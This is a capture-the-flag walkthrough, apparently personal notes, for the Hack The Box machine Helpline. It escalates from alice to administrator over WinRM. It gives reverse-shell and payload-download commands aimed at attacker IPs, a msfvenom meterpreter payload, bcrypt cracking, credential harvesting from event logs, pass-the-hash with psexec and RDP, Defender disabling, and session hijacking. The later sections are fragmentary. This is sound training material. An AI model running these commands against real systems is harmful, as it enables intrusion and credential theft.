I luckily decided to use Helpline as my test run for Commando VM. That allowed me to avoid challenges that I would have faces using Kali. This is the primary intended route for Helpline, using Windows to connect to the host. Up to this point, my recon has provided credentials for alice and zachary (and some others). I’ll pick up here, getting a shell as alice, using zachary’s creds to find tolu’ss creds in event logs. I can use those creds to get a WinRM shell as tolu, who can access leo’s scripts, one of which I can inject into to get a shell as leo. On leo’s desktop, there’s a powershell secure string exported as xml that is the administrator password, which I can decrypt and then WinRM as administrator.
Shell as alice
Were I working from Kali, I would use Alamot’s ruby WinRM shell. That would actually have worked fine on this part. It would fail later when I would get to user.txt, and I’ll explain that then. Luckily, I was using Windows, so I could connect with PSSession. I’ll need to do a bit of config on this box first.
Enable WinRM
- Add helpline to hosts. Windows likes talking hostnames instead of IPs, so this makes things easier.
# localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost 10.10.10.132 helpline - In a
cmdwindow, runwinrm quickconfig. This starts the WinRM service, opens the firewall, etc. - Add all hosts to my trusted hosts list. This will allow me to connect to HELPLINE:
C:\Users\0xdf>winrm set winrm/config/client @{TrustedHosts="*"} Client NetworkDelayms = 5000 URLPrefix = wsman AllowUnencrypted = false Auth Basic = true Digest = true Kerberos = true Negotiate = true Certificate = true CredSSP = false DefaultPorts HTTP = 5985 HTTPS = 5986 TrustedHosts = * - Enable CredSSP. This will allow me to connect with
-authentication CredSSPlater. In PowerShell, runEnable-WSManCredSSP -Role "Client" -DelegateComputer "*". - Allow delegation by opening
gpedit.msc(as administrator), and navigating to Computer Configuration -> Administrative Templates -> System -> Credentials Delegations -> Allow Delegating Fresh Credendials with NTLM only server authentication. Select Enabled, and add helpline to the list:
Enter-PSSession
Now I can get onto the box as alice. I noted in the original recon that WinRM was open, and in trying all the creds I have collected, I found that alice’s creds “$sys4ops@megabank!” worked. On Windows, to get a WinRM shell, I’ll use Enter-PSSession:
C:\Users\puck>powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\Users\puck> Enter-PSSession -ComputerName helpline -Credential helpline\alice [helpline]: PS C:\Users\alice\Documents>
Note I’m not using CredSSP authentication here. I can, but I don’t need to at this point. Again, more later.
Limited Shell
This shell is a very limited one. I’m in Constrained language mode:
[helpline]: PS C:\Users\alice\Documents> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
I also can’t run any executables due to AppLocker:
[helpline]: PS C:\Users\alice\AppData\Local\Temp> .\nc.exe -e cmd.exe 10.10.14.14 443
Program 'nc.exe' failed to run: This program is blocked by group policy. For more information, contact your system
administrator.ax of this command is:
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException], RemoteException
+ FullyQualifiedErrorId : NativeCommandFailed
I tried several CLM and AppLocker breakouts, without much success.
AMSI is also enabled. I don’t tend to rely on Metasploit, but for the sake of demonstration, if I try to even copy a meterpreter payload over to target, it flags and blocks:
C:\share>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f exe -o met.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: met.exe
[helpline]: PS C:\Windows\System32\spool\drivers\color> copy \\10.10.14.14\share\met.exe met.exe
Operation did not complete successfully because the file contains a virus or potentially unwanted software.
+ CategoryInfo : NotSpecified: (:) [Copy-Item], IOException
+ FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand
Transport
I’ll primarily rely on two methods for moving files to and from Helpline.
SMB
Since I’m using a Windows attack box, I’ll enable an actual SMB share. I created a user, dummy, with no group membership outside of Users. I created a folder, C:\share. In properties I went to “Sharing” -> “Advanced Sharing…”. There I checked the “Share this folder” box, and then clicked on Permissions. I added dummy, and removed all other users:
Then, back to the folder properties, I went to the “Security” tab, and made sure that dummy had full control of the folder.
Now, from target, I can use net use to establish the connection, and then copy to and from the folder:
[helpline]: PS C:\> net use /u:dummy \\10.10.14.14\share [password]
The command completed successfully
Now I can copy to and from the UNC path \\10.10.14.14\share\.
HTTP
I can’t new-object net.webclient because of constrained language mode, but I can invoke-webrequest (or iwr). I’ll use python -m http.server on my windows host just like on my Kali box (except it’s python3 by default here, so http.server instead of SimpleHTTPServer).
I gave an example of this above when I used it to get nc:
[helpline]: PS C:\Users\alice\AppData\Local\Temp> iwr -uri http://10.10.14.2:8000/nc64.exe -OutFile nc.exe
Shell as tolu
Enumeration
In looking around, it’s always a good idea to check out the database associated with a website. I won’t actually find anything that I didn’t get from the database backup I retrieved via LFI, but if I hadn’t done that, I could have found those credentials via the shell as alice.
The SPD instance is located on the E: drive in ManagedEngine:
[helpline]: PS E:\ManageEngine> dir
Directory: E:\ManageEngine
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/16/2019 9:31 PM ServiceDesk
The SDP documentation gives the location of psql.exe as well as some examples commands to connect to it. I had to play with this for a while to get it working, but eventually the command I found to work was:
[helpline]: PS E:\ManageEngine\servicedesk\pgsql\bin> ./psql.exe -h 127.0.0.1 -p 65432 -U postgres -w -c "\list"
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-------------+----------+----------+---------+-------+-----------------------
postgres | postgres | UTF8 | C | C |
servicedesk | postgres | UTF8 | C | C |
template0 | postgres | UTF8 | C | C | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | C | C | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)
[helpline]: PS E:\ManageEngine\servicedesk\pgsql\bin>
I’ll dump the tables in servicedesk
[helpline]: PS E:\ManageEngine\servicedesk\pgsql\bin> ./psql.exe -h 127.0.0.1 -p 65432 -U postgres -w -d servicedesk -c "\dt"
List of relations
Schema | Name | Type | Owner
--------+--------------------------------+-------+----------
public | aaaaccadminprofile | table | postgres
public | aaaaccbadloginstatus | table | postgres
public | aaaacchttpsession | table | postgres
public | aaaaccoldpassword | table | postgres
public | aaaaccount | table | postgres
public | aaaaccountowner | table | postgres
public | aaaaccountstatus | table | postgres
--snip--
I’ll check out aaapassword and find the same hashes I found in the database:
[helpline]: PS E:\ManageEngine\servicedesk\pgsql\bin> ./psql.exe -h 127.0.0.1 -p 65432 -U postgres -w -d servicedesk -c "select * from aaapassword;"
password_id | password | algorithm | salt | passwdprofile_id | passwdrule_id | createdtime | factor
-------------+--------------------------------------------------------------+-----------+-------------------------------+------------------+---------------+---------------+--------
1 | $2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG | bcrypt | $2a$12$6VGARvoc/dRcRxOckr6Wmu | 2 | 1 | 1545350288006 | 12
302 | $2a$12$2WVZ7E/MbRgTqdkWCOrJP.qWCHcsa37pnlK.0OyHKfd4lyDweMtki | bcrypt | $2a$12$2WVZ7E/MbRgTqdkWCOrJP. | 2 | 1 | 1545428506907 |
303 | $2a$12$Em8etmNxTinGuub6rFdSwubakrWy9BEskUgq4uelRqAfAXIUpZrmm | bcrypt | $2a$12$Em8etmNxTinGuub6rFdSwu | 2 | 1 | 1545428808687 |
2 | $2a$12$hmG6bvLokc9jNMYqoCpw2Op5ji7CWeBssq1xeCmU.ln/yh0OBPuDa | bcrypt | $2a$12$hmG6bvLokc9jNMYqoCpw2O | 2 | 1 | 1545428960671 | 12
601 | $2a$12$6sw6V2qSWANP.QxLarjHKOn3tntRUthhCrwt7NWleMIcIN24Clyyu | bcrypt | $2a$12$6sw6V2qSWANP.QxLarjHKO | 2 | 1 | 1545514864248 |
602 | $2a$12$X2lV6Bm7MQomIunT5C651.PiqAq6IyATiYssprUbNgX3vJkxNCCDa | bcrypt | $2a$12$X2lV6Bm7MQomIunT5C651. | 2 | 1 | 1545515091170 |
603 | $2a$12$gFZpYK8alTDXHPaFlK51XeBCxnvqSShZ5IO/T5GGliBGfAOxwHtHu | bcrypt | $2a$12$gFZpYK8alTDXHPaFlK51Xe | 2 | 1 | 1545516114589 |
604 | $2a$12$4.iNcgnAd8Kyy7q/mgkTFuI14KDBEpMhY/RyzCE4TEMsvd.B9jHuy | bcrypt | $2a$12$4.iNcgnAd8Kyy7q/mgkTFu | 2 | 1 | 1545517215465 |
(8 rows)
[helpline]: PS E:\ManageEngine\servicedesk\pgsql\bin>
.
I can crack them
These are bcrypt hashes, which are super slow to crack. To run all of rockyou was going to take my computer 40+ days. That said, in the first 10 minutes, I got three results:
$ hashcat -m 3200 hashes /usr/share/wordlists/rockyou.txt --force
$2a$12$gFZpYK8alTDXHPaFlK51XeBCxnvqSShZ5IO/T5GGliBGfAOxwHtHu:1234567890 - 603 mary
$2a$12$Em8etmNxTinGuub6rFdSwubakrWy9BEskUgq4uelRqAfAXIUpZrmm:0987654321 - 303 zachary_33258
$2a$12$X2lV6Bm7MQomIunT5C651.PiqAq6IyATiYssprUbNgX3vJkxNCCDa:1q2w3e4r - 602 fiona
I did log into SDP with each of these, but didn’t find any information that would help me solve the box.
.
zachary
alice doesn’t have any interesting files in her home directory, so I started looking at other users:
[helpline]: PS C:\Users\alice\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator alice DefaultAccount
Guest leo niels
tolu WDAGUtilityAccount zachary
The command completed with one or more errors.
zachary jumped out, since I had his SDP password, and password reuse is common. Looking more closely at zachary, I noticed he’s in the Event Log Readers group.
[helpline]: PS C:\Users\alice\Documents> net user zachary
User name zachary
Full Name zachary
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 12/21/2018 10:25:34 PM
Password expires Never
Password changeable 12/21/2018 10:25:34 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 12/28/2018 10:57:32 PM
Logon hours allowed All
Local Group Memberships *Event Log Readers *Users
Global Group memberships *None
The command completed successfully.
I can’t use zachary’s credentials to get a shell, as he’s not administrators or in “Remove Management Users” groups:
[helpline]: PS C:\Users\alice\Documents> net localgroup "Remote Management Users"
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
alice
tolu
The command completed successfully.
Logs
In thinking about ways to read event logs, in addition to PowerShell’s Get-EventLog, there’s also wevtutil.exe. The docs show that wevtutil can take a /u parameter to specify the user and a /p parameter to specify the password for that user. That means that I can query event logs as zachary from my shell as alice.
Getting through these logs was a bit of a slog. After a few queries, I dumped the full security log into a file that I could findstr against:
[helpline]: PS C:\> wevtutil.exe /u:HELPLINE\zachary /r:helpline /p:0987654321 /rd:true qe security /f:text > sec.txt
I’ll pull sec.txt back to my host, and dig around. I started looking for logs about other users on the box, and especially tolu, as that user is in the “Remote Management Users” group. These lines jumped out at me:
Process Command Line: "C:\Windows\system32\net.exe" use T: \\helpline\helpdesk_stats /USER:tolu !zaq1234567890pl!99
Process Command Line: "C:\Windows\system32\systeminfo.exe" /S \\helpline /U /USER:tolu /P !zaq1234567890pl!99
Two independent program executions with the same password for tolu. I pulled the full log entries for each of these events:
Both were instances of administrator running a process as tolu.
Enter-PSSession
Remembering that tolu was in the “Remote Management Users” group, I can create a new session as tolu, using the password “!zaq1234567890pl!99”:
PS C:\Users\puck> Enter-PSSession -ComputerName helpline -Credential tolu [helpline]: PS C:\Users\tolu\Documents> whoami helpline\tolu [helpline]: PS C:\Users\tolu\Documents>
The shell is still limited:
[helpline]: PS C:\Users\tolu\Desktop> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
user.txt / CredSSP
And I’ll find uset.txt on tolu’s desktop. But I can’t read it:
[helpline]: PS C:\Users\tolu\desktop> type user.txt
type : Access to the path 'C:\Users\tolu\desktop\user.txt' is denied.
+ CategoryInfo : PermissionDenied: (C:\Users\tolu\desktop\user.txt:String) [Get-Content], UnauthorizedAcc
essException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
It’s not a permissions thing, as I have full control on the file:
[helpline]: PS C:\Users\tolu\Desktop> icacls .\user.txt
.\user.txt NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
HELPLINE\tolu:(I)(F)
It is because the file is encrypted. For demonstration, I’ll create another file on the desktop:
[helpline]: PS C:\Users\tolu\desktop> echo 0xdf > 0xdf.txt
Now I’ll use cipher to get information:
[helpline]: PS C:\Users\tolu\Desktop> cipher
Listing C:\Users\tolu\Desktop\
New files added to this directory will not be encrypted.
U 0xdf.txt
E user.txt
I can see that user.txt has an E for encrypted. The other file I just made has a U for unencrypted.
It turns out this is an issue with WinRM and how it authenticates securely by default. It doesn’t send my password or the necessary material to decrypt the file. I can force it to do that using the -Authentication CredSSP option. It’s less secure, but it includes the full credential, and thus is able to decrypt files as well. This is the part that I don’t know any way to do from a Linux client.
I enabled it earlier when I was setting up WinRM. Now I just need to add the option when I connect:
PS > Enter-PSSession -ComputerName helpline -Credential tolu -Authentication Credssp
Windows PowerShell credential request
Enter your credentials.
Password for user tolu: *******************
[helpline]: PS C:\Users\tolu\Desktop> type user.txt
0d522fa8...
Shell as leo
Enumeration
As tolu, I can now access folders on E:\ that I couldn’t before, Helpdesk_Stats, Restore, and Scripts:
[helpline]: PS E:\> icacls * /C
$RECYCLE.BIN BUILTIN\Administrators:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Users:(NP)(RX,AD,WA)
Mandatory Label\Low Mandatory Level:(OI)(CI)(IO)(NW)
icacls : Backups: Access is denied.
+ CategoryInfo : NotSpecified: (Backups: Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Helpdesk_Stats NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HELPLINE\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
HELPLINE\tolu:(OI)(CI)(RX)
ManageEngine BUILTIN\Administrators:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
CREATOR OWNER:(OI)(CI)(IO)(F)
BUILTIN\Users:(OI)(CI)(RX)
ManageEngine_ServiceDesk_Plus.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
Restore Everyone:(DENY)(D,WA)
CREATOR OWNER:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HELPLINE\leo:(OI)(CI)(M)
BUILTIN\Administrators:(OI)(CI)(F)
HELPLINE\tolu:(OI)(CI)(RX)
Scripts Everyone:(DENY)(D,WDAC,WO,WA)
NT AUTHORITY\SYSTEM:(OI)(CI)(N)
CREATOR OWNER:(OI)(CI)(IO)(F)
HELPLINE\leo:(OI)(CI)(M)
HELPLINE\tolu:(OI)(CI)(M)
BUILTIN\Administrators:(OI)(CI)(F)
System Volume Information
:
Access is denied.
Successfully processed 6 files; Failed processing 2 files
Helpdesk_Stats contains an xls file that didn’t provide anything interesting.
Restore was empty.
Scripts has 3 files and a folder:
[helpline]: PS E:\Scripts> ls
Directory: E:\Scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/18/2018 10:18 AM Processing
-a---- 4/13/2019 10:25 AM 593 output.txt
-a---- 1/20/2019 10:01 PM 7466 SDP_Checks.ps1
-a---- 12/18/2018 10:18 AM 183 successful_backups.txt
I’ll note right away that three of the four were last modified a few months ago, but output.txt was modified 3 minutes ago. That’s a good sign that something is running that’s creating this output.
I’ll also notice that as tolu, I can modify output.txt, and read but not modify SDP_Checks.ps1 and successful_backups.txt:
[helpline]: PS E:\Scripts> icacls * /C
output.txt NT AUTHORITY\SYSTEM:(I)(N)
HELPLINE\leo:(I)(F)
HELPLINE\tolu:(I)(M)
BUILTIN\Administrators:(I)(F)
icacls : Processing: Access is denied.
+ CategoryInfo : NotSpecified: (Processing: Access is denied.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
SDP_Checks.ps1 NT AUTHORITY\SYSTEM:(N)
HELPLINE\leo:(RX)
HELPLINE\tolu:(R)
BUILTIN\Administrators:(F)
successful_backups.txt NT AUTHORITY\SYSTEM:(F)
HELPLINE\leo:(RX)
BUILTIN\Administrators:(F)
HELPLINE\tolu:(RX)
Successfully processed 3 files; Failed processing 1 files
SDP_Checks.ps1
--snip-- , see 0xdf's writeup
Shell as administrator
With a shell as leo, I’ll notice the file admin-pass.xml on his desktop:
C:\Users\leo\Desktop>type admin-pass.xml
01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f2fefa98a0d84f4b917dd8a1f5889c8100000000020000000000106600000001000020000000c2d2dd6646fb78feb6f7920ed36b0ade40efeaec6b090556fe6efb52a7e847cc000000000e8000000002000020000000c41d656142bd869ea7eeae22fc00f0f707ebd676a7f5fe04a0d0932dffac3f48300000006cbf505e52b6e132a07de261042bcdca80d0d12ce7e8e60022ff8d9bc042a437a1c49aa0c7943c58e802d1c758fc5dd340000000c4a81c4415883f937970216c5d91acbf80def08ad70a02b061ec88c9bb4ecd14301828044fefc3415f5e128cfb389cbe8968feb8785914070e8aebd6504afcaa
Given the filename and that data, that looks like a PowerShell secure string. If that’s the case, it will only be accessibly in the context of the user who created it, which I’m going to guess is leo.
My current shell isn’t stable enough to run a PowerShell session within it. I could either try to get a more stable PowerShell shell, or work from here.
I’ll swap beryllium in for my dll to get a meterpreter shell, and use meterpreter’s powershell mod:
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS C:\users\leo\desktop> $s = cat admin-pass.xml
$s = cat admin-pass.xml
PS C:\users\leo\desktop> $s
$s
01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f2fefa98a0d84f4b917dd8a1f5889c8100000000020000000000106600000001000020000000c2d2dd6646fb78feb6f7920ed36b0ade40efeaec6b090556fe6efb52a7e847cc000000000e8000000002000020000000c41d656142bd869ea7eeae22fc00f0f707ebd676a7f5fe04a0d0932dffac3f48300000006cbf505e52b6e132a07de261042bcdca80d0d12ce7e8e60022ff8d9bc042a437a1c49aa0c7943c58e802d1c758fc5dd340000000c4a81c4415883f937970216c5d91acbf80def08ad70a02b061ec88c9bb4ecd14301828044fefc3415f5e128cfb389cbe8968feb8785914070e8aebd6504afcaa
PS C:\users\leo\desktop> $ss = Convertto-securestring -string $s
$ss = Convertto-securestring -string $s
PS C:\users\leo\desktop> $ss
$ss
System.Security.SecureString
PS C:\users\leo\desktop> (New-Object System.Management.Automation.PSCredential 'N/A', $ss).GetNetworkCredential().Password
(New-Object System.Management.Automation.PSCredential 'N/A', $ss).GetNetworkCredential().Password
mb@letmein@SERVER#acc
Now with that password, I’ll get a connection as administrator (with CredSSP, as root.txt is also encrypted):
PS C:\Users\0xdf > Enter-PSSession -ComputerName helpline -Credential helpline\administrator -Authentication Credssp
Windows PowerShell credential request
Enter your credentials.
Password for user helpline\administrator: *********************
[helpline]: PS C:\Users\Administrator\Documents> cd ..\Desktop\
[helpline]: PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/20/2018 11:09 PM 32 root.txt
[helpline]: PS C:\Users\Administrator\Desktop> type root.txt
d814211f...
with password : mb@letmein@SERVER#acc , we can login as AdministratorPS C:\Users\puck> Enter-PSSession -ComputerName helpline -Credential helpline\administrator
[helpline]: PS C:\Users\Administrator\Documents> whoami
helpline\administrator
[helpline]: PS C:\Users\Administrator\Documents>
From Linux
$ evil-winrm -i helpline -u alice -p '$sys4ops@megabank!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alice\Documents>
*Evil-WinRM* PS C:\programdata> iwr -uri http://10.10.14.2:8000/nc64.exe -outfile nc64.exe
*Evil-WinRM* PS C:\programdata> ./nc64.exe -e powershell 10.10.14.10 443
Program 'nc64.exe' failed to run: This program is blocked by group policy. For more information, contact your system administrator
*Evil-WinRM* PS C:\programdata>
.
$ evil-winrm -i helpline -u tolu -p '!zaq1234567890pl!99'
$ evil-winrm -i helpline -u administrator -p 'mb@letmein@SERVER#acc'
Enable RDP
*Evil-WinRM* PS C:\Users\Administrator\desktop> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\desktop> Set-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name "UserAuthentication" -Value 1
*Evil-WinRM* PS C:\Users\Administrator\desktop> Set-ItemProperty -Path 'HKLM:\\System\\CurrentControlSet\\Control\\Terminal Server'-name "fDenyTSConnections" -Value 0
Set-NetFirewallRule -Name RemoteDesktop-UserMode-In-TCP -Enabled truethen
$ xfreerdp /v:10.10.10.132:3389 /u:administrator /pth:d5312b245d641b3fae0d07493a022622
.
└─$ impacket-psexec administrator@10.10.10.132 cmd -hashes 'aad3b435b51404eeaad3b435b51404ee:d5312b245d641b3fae0d07493a022622'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.132.....
[*] Found writable share ADMIN$
[*] Uploading file qFUuWUeA.exe
[*] Opening SVCManager on 10.10.10.132.....
[*] Creating service vuoh on 10.10.10.132.....
[*] Starting service vuoh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> query session
SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
console leo 1 Active
rdp-tcp 65536 Listen
C:\Windows\system32>
.
1 console run
C:\Windows\system32> query session
SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
console leo 1 Active
rdp-tcp#12 2 ConnQ
rdp-tcp 65536 Listen
C:\Windows\system32> tscon 1 /dest:rdp-tcp#13
C:\Windows\system32> query session
SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
rdp-tcp#13 leo 1 Active
console 3 Conn
rdp-tcp 65536 Listen
C:\Windows\system32>
other console run
┌──(puck㉿kali)-[~/htb/helpline]
└─$ xfreerdp /v:10.10.10.132:3389 /u:administrator /pth:d5312b245d641b3fae0d07493a022622
[17:09:26:407] [277970:277971] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[17:09:26:407] [277970:277971] [WARN][com.freerdp.crypto] - CN = HELPLINE
[17:09:26:408] [277970:277971] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[17:09:26:408] [277970:277971] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[17:09:26:408] [277970:277971] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[17:09:26:408] [277970:277971] [ERROR][com.freerdp.crypto] - The hostname used for this connection (10.10.10.132:3389)
[17:09:26:408] [277970:277971] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[17:09:26:408] [277970:277971] [ERROR][com.freerdp.crypto] - Common Name (CN):
[17:09:26:408] [277970:277971] [ERROR][com.freerdp.crypto] - HELPLINE
[17:09:26:408] [277970:277971] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 10.10.10.132:3389 (RDP-Server):
Common Name: HELPLINE
Subject: CN = HELPLINE
Issuer: CN = HELPLINE
Thumbprint: a3:9b:0b:29:23:e0:ab:20:dd:b2:6c:18:bf:f1:f5:c4:ee:0c:14:25:65:23:6d:b1:8f:40:6d:8b:b4:1b:88:1e
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) T
[17:09:30:900] [277970:277971] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[17:09:30:900] [277970:277971] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[17:09:30:935] [277970:277971] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[17:09:30:935] [277970:277971] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
login as leo
.
root flag can not be decrypted we need mimikatz for that
C:\ProgramData> powershell -c iwr -uri http://10.10.14.8:8000/nc64.exe -outfile nc64.exe
C:\ProgramData> nc64.exe -e powershell 10.10.14.8 443
.
PS C:\ProgramData>
set-mppreference -disablerealtimemonitoring $true
PS C:\ProgramData> set-mppreference -disablerealtimemonitoring $true
PS C:\ProgramData> cmd
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\ProgramData> powershell -c iwr -uri http://10.10.14.8:8000/mimikatz.exe -outfile mimikatz.exe
user.txt from rdp
1st
c:\Users\tolu\Desktop>whoami
helpline\administrator
c:\Users\tolu\Desktop>runas /user:tolu cmd.exe
Enter the password for tolu:!zaq1234567890pl!99 Attempting to start cmd.exe as user "HELPLINE\tolu" ... c:\Users\tolu\Desktop>
2nd
C:\Windows\system32>cd c:\users\tolu\desktop
c:\Users\tolu\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is DC4E-6627
Directory of c:\Users\tolu\Desktop
12/29/2018 09:21 PM <DIR> .
12/29/2018 09:21 PM <DIR> ..
12/20/2018 11:12 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 3,103,965,184 bytes free
c:\Users\tolu\Desktop>type user.txt
0d522fa8d6d2671636ac7e73216808d3
c:\Users\tolu\Desktop>
.